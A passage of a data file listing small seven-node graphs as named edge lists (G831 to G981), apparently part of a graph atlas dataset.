[2, 5],
[3, 2],
[6, 2],
[3, 6],
[7, 5],
[7, 3],
[4, 7]]],
['edgelist',
'G832',
7,
[[4, 3],
[7, 4],
[6, 7],
[1, 6],
[3, 1],
[2, 3],
[1, 2],
[6, 2],
[3, 6],
[5, 3],
[7, 5]]],
['edgelist',
'G833',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 2],
[6, 4],
[6, 2],
[7, 5],
[7, 6],
[4, 7]]],
['edgelist',
'G834',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 4],
[7, 1],
[7, 3],
[7, 4],
[6, 7]]],
['edgelist',
'G835',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 6],
[5, 7],
[4, 7],
[2, 7]]],
['edgelist',
'G836',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 6],
[2, 7],
[3, 7],
[5, 3]]],
['edgelist',
'G837',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[7, 2],
[7, 5],
[6, 3],
[4, 6]]],
['edgelist',
'G838',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[7, 2],
[5, 7],
[7, 6],
[3, 7]]],
['edgelist',
'G839',
7,
[[1, 4],
[1, 7],
[2, 3],
[2, 6],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G840',
7,
[[6, 2],
[7, 6],
[5, 7],
[4, 5],
[3, 4],
[1, 3],
[2, 1],
[6, 1],
[7, 1],
[3, 7],
[5, 3]]],
['edgelist',
'G841',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[1, 5],
[6, 3],
[4, 6],
[7, 1],
[7, 6],
[7, 3],
[4, 7]]],
['edgelist',
'G842',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[5, 2],
[6, 2],
[7, 1],
[7, 2],
[6, 4],
[5, 6]]],
['edgelist',
'G843',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G844',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[6, 5],
[6, 4],
[7, 5],
[7, 3],
[7, 1],
[2, 7]]],
['edgelist',
'G845',
7,
[[5, 2],
[6, 5],
[3, 6],
[2, 3],
[1, 2],
[6, 1],
[7, 6],
[4, 7],
[3, 4],
[1, 3],
[5, 1]]],
['edgelist',
'G846',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[7, 2],
[7, 3],
[6, 2],
[4, 6],
[6, 3],
[5, 6]]],
['edgelist',
'G847',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G848',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 5],
[7, 3],
[3, 1],
[5, 1]]],
['edgelist',
'G849',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[6, 5],
[6, 4],
[7, 5],
[7, 3],
[5, 1],
[2, 5]]],
['edgelist',
'G850',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[7, 3],
[1, 7],
[2, 7]]],
['edgelist',
'G851',
7,
[[1, 4],
[5, 1],
[2, 5],
[4, 2],
[5, 4],
[1, 2],
[3, 5],
[7, 3],
[6, 7],
[3, 6],
[2, 3]]],
['edgelist',
'G852',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G853',
7,
[[5, 2],
[6, 5],
[3, 6],
[2, 3],
[1, 2],
[5, 1],
[6, 1],
[7, 6],
[4, 7],
[3, 4],
[6, 4]]],
['edgelist',
'G854',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[6, 2],
[6, 5],
[7, 6],
[5, 7]]],
['edgelist',
'G855',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[7, 4],
[7, 5]]],
['edgelist',
'G856',
7,
[[1, 5],
[4, 1],
[2, 4],
[5, 2],
[4, 5],
[6, 2],
[7, 6],
[2, 7],
[3, 2],
[6, 3],
[7, 3]]],
['edgelist',
'G857',
7,
[[5, 2],
[1, 5],
[4, 1],
[3, 6],
[6, 5],
[7, 6],
[3, 7],
[2, 3],
[4, 2],
[7, 4],
[3, 4]]],
['edgelist',
'G858',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 3],
[6, 5],
[6, 4],
[7, 1],
[7, 6],
[4, 7]]],
['edgelist',
'G859',
7,
[[6, 3],
[3, 5],
[6, 4],
[5, 2],
[6, 5],
[1, 2],
[4, 1],
[1, 3],
[7, 3],
[7, 4],
[1, 7]]],
['edgelist',
'G860',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G861',
7,
[[1, 4],
[1, 5],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G862',
7,
[[5, 1],
[4, 5],
[6, 4],
[1, 6],
[2, 1],
[3, 2],
[4, 3],
[5, 2],
[6, 3],
[7, 5],
[6, 7]]],
['edgelist',
'G863',
7,
[[3, 4],
[5, 3],
[1, 5],
[6, 1],
[2, 6],
[5, 2],
[4, 5],
[6, 4],
[2, 1],
[7, 6],
[7, 3]]],
['edgelist',
'G864',
7,
[[5, 2],
[1, 5],
[4, 1],
[5, 4],
[6, 5],
[7, 6],
[3, 7],
[2, 3],
[4, 2],
[7, 4],
[3, 6]]],
['edgelist',
'G865',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[1, 2],
[7, 1],
[6, 7],
[3, 6],
[2, 6],
[5, 2]]],
['edgelist',
'G866',
7,
[[1, 4],
[1, 5],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G867',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[6, 2],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G868',
7,
[[5, 2],
[6, 5],
[7, 6],
[4, 7],
[3, 4],
[2, 3],
[1, 2],
[6, 1],
[5, 1],
[6, 3],
[7, 3]]],
['edgelist',
'G869',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[5, 3],
[4, 6],
[5, 6],
[4, 1],
[7, 6],
[7, 2]]],
['edgelist',
'G870',
7,
[[1, 5],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[2, 3],
[7, 2],
[6, 7],
[4, 6],
[6, 5],
[3, 7]]],
['edgelist',
'G871',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 2],
[5, 3],
[7, 3],
[4, 7],
[5, 7]]],
['edgelist',
'G872',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[2, 7],
[6, 3],
[5, 2],
[1, 4]]],
['edgelist',
'G873',
7,
[[1, 4],
[1, 5],
[2, 3],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G874',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 4],
[7, 5],
[5, 3],
[1, 4]]],
['edgelist',
'G875',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 7],
[5, 6]]],
['edgelist',
'G876',
7,
[[5, 4],
[3, 5],
[4, 3],
[1, 4],
[3, 2],
[6, 5],
[6, 1],
[7, 5],
[7, 2],
[2, 6],
[1, 7]]],
['edgelist',
'G877',
7,
[[7, 5],
[4, 7],
[2, 4],
[5, 2],
[1, 5],
[3, 1],
[4, 3],
[1, 2],
[6, 1],
[7, 6],
[6, 3]]],
['edgelist',
'G878',
7,
[[7, 2],
[3, 7],
[2, 3],
[1, 2],
[4, 1],
[5, 4],
[6, 5],
[4, 6],
[3, 1],
[5, 1],
[6, 7]]],
['edgelist',
'G879',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4],
[1, 3]]],
['edgelist',
'G880',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[1, 7]]],
['edgelist',
'G881',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[6, 2],
[3, 5]]],
['edgelist',
'G882',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4]]],
['edgelist',
'G883',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4]]],
['edgelist',
'G884',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6],
[7, 2]]],
['edgelist',
'G885',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[5, 7],
[6, 4]]],
['edgelist',
'G886',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[2, 7]]],
['edgelist',
'G887',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[4, 7]]],
['edgelist',
'G888',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[5, 7]]],
['edgelist',
'G889',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[7, 2]]],
['edgelist',
'G890',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[1, 7]]],
['edgelist',
'G891',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[1, 7]]],
['edgelist',
'G892',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[3, 7]]],
['edgelist',
'G893',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[2, 7]]],
['edgelist',
'G894',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[5, 7]]],
['edgelist',
'G895',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[7, 2],
[7, 6]]],
['edgelist',
'G896',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[2, 7]]],
['edgelist',
'G897',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[4, 6],
[1, 4],
[6, 7]]],
['edgelist',
'G898',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[2, 5]]],
['edgelist',
'G899',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[4, 6],
[1, 4],
[4, 7]]],
['edgelist',
'G900',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[5, 7]]],
['edgelist',
'G901',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[3, 7]]],
['edgelist',
'G902',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[1, 5]]],
['edgelist',
'G903',
7,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6],
[4, 7]]],
['edgelist',
'G904',
7,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6],
[1, 7]]],
['edgelist',
'G905',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6],
[6, 7]]],
['edgelist',
'G906',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4],
[6, 7]]],
['edgelist',
'G907',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 7]]],
['edgelist',
'G908',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[1, 7]]],
['edgelist',
'G909',
7,
[[4, 7],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[7, 6],
[3, 7],
[6, 2],
[1, 4],
[2, 7],
[1, 2],
[5, 6]]],
['edgelist',
'G910',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[4, 7]]],
['edgelist',
'G911',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4],
[1, 7]]],
['edgelist',
'G912',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3],
[6, 7]]],
['edgelist',
'G913',
7,
[[1, 4],
[7, 1],
[6, 7],
[4, 6],
[2, 4],
[7, 2],
[5, 7],
[4, 5],
[3, 4],
[7, 3],
[4, 7],
[6, 5]]],
['edgelist',
'G914',
7,
[[1, 2],
[5, 1],
[6, 5],
[2, 6],
[5, 2],
[3, 5],
[2, 3],
[7, 2],
[5, 7],
[3, 7],
[4, 3],
[5, 4]]],
['edgelist',
'G915',
7,
[[5, 2],
[4, 3],
[4, 1],
[5, 3],
[6, 2],
[6, 1],
[4, 6],
[5, 4],
[6, 5],
[7, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G916',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[5, 3],
[4, 5],
[6, 4],
[1, 6],
[7, 4],
[2, 7]]],
['edgelist',
'G917',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[7, 4],
[1, 7],
[6, 1],
[2, 6],
[5, 2],
[3, 5]]],
['edgelist',
'G918',
7,
[[7, 3],
[6, 7],
[4, 6],
[3, 4],
[2, 3],
[5, 2],
[6, 5],
[3, 6],
[5, 3],
[1, 5],
[2, 1],
[6, 2]]],
['edgelist',
'G919',
7,
[[6, 5],
[7, 6],
[4, 7],
[5, 4],
[1, 5],
[4, 1],
[2, 4],
[1, 2],
[5, 2],
[4, 6],
[3, 4],
[5, 3]]],
['edgelist',
'G920',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[2, 6],
[7, 2],
[1, 7]]],
['edgelist',
'G921',
7,
[[2, 3],
[1, 2],
[3, 1],
[4, 3],
[1, 4],
[2, 4],
[5, 3],
[1, 5],
[6, 5],
[3, 6],
[7, 3],
[2, 7]]],
['edgelist',
'G922',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 3],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G923',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[2, 6],
[7, 2],
[3, 7]]],
['edgelist',
'G924',
7,
[[2, 3],
[1, 2],
[3, 1],
[4, 3],
[1, 4],
[2, 4],
[5, 3],
[1, 5],
[7, 5],
[3, 7],
[6, 3],
[5, 6]]],
['edgelist',
'G925',
7,
[[2, 1],
[3, 2],
[1, 3],
[4, 1],
[5, 4],
[1, 5],
[6, 1],
[4, 6],
[5, 6],
[7, 5],
[4, 7],
[7, 1]]],
['edgelist',
'G926',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[7, 6],
[3, 7]]],
['edgelist',
'G927',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 5],
[1, 7],
[6, 1],
[4, 6]]],
['edgelist',
'G928',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[2, 6],
[7, 2],
[1, 7],
[6, 1],
[5, 6]]],
['edgelist',
'G929',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 2],
[1, 7],
[6, 1],
[3, 6]]],
['edgelist',
'G930',
7,
[[6, 5],
[4, 6],
[5, 4],
[7, 5],
[4, 7],
[3, 4],
[5, 3],
[1, 5],
[4, 1],
[2, 1],
[3, 2],
[7, 3]]],
['edgelist',
'G931',
7,
[[5, 2],
[4, 3],
[4, 1],
[5, 3],
[6, 2],
[6, 1],
[4, 6],
[5, 4],
[6, 5],
[7, 6],
[1, 7],
[4, 7]]],
['edgelist',
'G932',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 2],
[1, 7],
[6, 1],
[2, 6]]],
['edgelist',
'G933',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[4, 2],
[6, 2],
[7, 6],
[5, 7]]],
['edgelist',
'G934',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 5],
[4, 6],
[7, 4],
[5, 7]]],
['edgelist',
'G935',
7,
[[2, 1],
[3, 2],
[4, 3],
[1, 4],
[5, 4],
[2, 5],
[5, 1],
[6, 5],
[1, 6],
[4, 6],
[7, 1],
[2, 7]]],
['edgelist',
'G936',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 3],
[5, 7],
[6, 1],
[2, 6]]],
['edgelist',
'G937',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[6, 5],
[3, 6],
[2, 6],
[7, 2],
[6, 7]]],
['edgelist',
'G938',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[5, 3],
[6, 4],
[7, 2],
[7, 5],
[5, 1],
[4, 5],
[2, 6]]],
['edgelist',
'G939',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 3],
[5, 4],
[5, 2],
[1, 5],
[6, 3],
[6, 5],
[7, 1],
[4, 7]]],
['edgelist',
'G940',
7,
[[6, 1],
[3, 6],
[7, 3],
[4, 7],
[3, 4],
[2, 3],
[1, 2],
[5, 1],
[2, 5],
[6, 2],
[7, 6],
[1, 3]]],
['edgelist',
'G941',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[7, 5],
[3, 7],
[6, 3],
[4, 6]]],
['edgelist',
'G942',
7,
[[1, 3],
[2, 1],
[6, 2],
[4, 6],
[7, 4],
[3, 7],
[5, 3],
[4, 5],
[6, 5],
[3, 6],
[2, 3],
[5, 2]]],
['edgelist',
'G943',
7,
[[1, 3],
[2, 1],
[3, 2],
[1, 4],
[4, 2],
[5, 1],
[2, 5],
[5, 3],
[4, 5],
[6, 5],
[7, 6],
[4, 7]]],
['edgelist',
'G944',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[7, 2],
[3, 7],
[5, 7],
[4, 5],
[6, 4],
[7, 6]]],
['edgelist',
'G945',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 1],
[7, 6],
[1, 7],
[4, 5]]],
['edgelist',
'G946',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[3, 6],
[7, 1],
[4, 7]]],
['edgelist',
'G947',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[6, 5],
[7, 4],
[5, 7],
[2, 7],
[7, 6]]],
['edgelist',
'G948',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G949',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 3],
[7, 6],
[1, 7],
[7, 3],
[1, 6],
[2, 6],
[7, 2]]],
['edgelist',
'G950',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5],
[6, 2]]],
['edgelist',
'G951',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G952',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[5, 6],
[7, 5],
[6, 7]]],
['edgelist',
'G953',
7,
[[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 2],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 4],
[7, 2]]],
['edgelist',
'G954',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G955',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G956',
7,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[5, 7],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[7, 2],
[3, 7]]],
['edgelist',
'G957',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 4],
[7, 5],
[5, 3],
[1, 4],
[5, 4]]],
['edgelist',
'G958',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[7, 6]]],
['edgelist',
'G959',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[7, 6],
[1, 7],
[2, 7]]],
['edgelist',
'G960',
7,
[[1, 4],
[5, 1],
[3, 5],
[4, 3],
[2, 4],
[5, 2],
[2, 1],
[6, 2],
[6, 3],
[7, 2],
[3, 7],
[5, 7]]],
['edgelist',
'G961',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 7],
[6, 4],
[2, 6],
[7, 3]]],
['edgelist',
'G962',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 6],
[6, 4],
[7, 2],
[5, 7]]],
['edgelist',
'G963',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[2, 6],
[6, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G964',
7,
[[5, 4],
[2, 3],
[1, 2],
[1, 4],
[5, 1],
[7, 5],
[5, 3],
[6, 5],
[7, 3],
[7, 4],
[4, 3],
[6, 2]]],
['edgelist',
'G965',
7,
[[3, 4],
[5, 3],
[1, 5],
[7, 1],
[7, 6],
[5, 6],
[2, 4],
[6, 2],
[1, 6],
[7, 2],
[4, 7],
[6, 4]]],
['edgelist',
'G966',
7,
[[1, 4],
[1, 6],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G967',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G968',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[5, 4],
[6, 4],
[7, 2],
[4, 7],
[7, 3],
[1, 7],
[5, 7]]],
['edgelist',
'G969',
7,
[[1, 2],
[3, 5],
[1, 3],
[7, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4],
[5, 7]]],
['edgelist',
'G970',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 4],
[2, 7]]],
['edgelist',
'G971',
7,
[[5, 4],
[2, 3],
[6, 1],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[6, 2],
[7, 3],
[7, 4],
[4, 3],
[7, 5]]],
['edgelist',
'G972',
7,
[[3, 4],
[5, 3],
[6, 5],
[1, 6],
[7, 1],
[2, 7],
[4, 2],
[7, 4],
[6, 4],
[2, 6],
[5, 1],
[4, 1]]],
['edgelist',
'G973',
7,
[[1, 4],
[1, 6],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G974',
7,
[[4, 3],
[2, 3],
[6, 1],
[1, 4],
[5, 1],
[5, 2],
[7, 5],
[6, 2],
[7, 3],
[7, 4],
[7, 2],
[1, 7]]],
['edgelist',
'G975',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G976',
7,
[[1, 4],
[1, 6],
[2, 3],
[2, 5],
[2, 7],
[3, 5],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G977',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G978',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G979',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[4, 5],
[6, 4],
[3, 7],
[7, 2]]],
['edgelist',
'G980',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[6, 5],
[5, 2],
[4, 5],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G981',
7,
[[1, 3],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
